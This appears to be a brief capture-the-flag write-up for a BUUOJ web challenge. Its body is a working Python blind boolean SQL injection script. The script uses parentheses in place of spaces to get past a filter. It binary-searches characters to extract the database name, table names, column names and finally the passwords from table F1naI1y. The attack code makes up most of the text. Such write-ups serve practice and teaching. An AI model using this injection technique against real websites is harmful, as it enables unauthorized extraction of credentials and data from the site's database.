We found a lot of filtering, such as *spaces, we used () to bypass the script, the
website is too spam, the request is fast, there will be an error, and we need to add a sleep and wait
import time
import requests
url = "http://34e5371d-f910-48da-ae2e-26ed2b56eb8d.node3.buuoj.cn/search.php?id="
result = ''
i = 0
while True:
i = i + 1
head = 32
tail = 127
while head < tail:
mid = (head + tail) >> 1
# payload = '(ascii(substr(database(),%d,1))>%d)' % (i, mid)
# payload = f'(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{i},1))>{mid})'
# payload = f'(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="F1naI1y")),{i},1))>{mid})'
payload = f'(ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1))>{mid})'
r = requests.get(url + payload)
# print(r.text)
time.sleep(0.1)
if "Click" in r.text:
head = mid + 1
else:
tail = mid
if head != 32:
result += chr(head)
else:
break
print(result)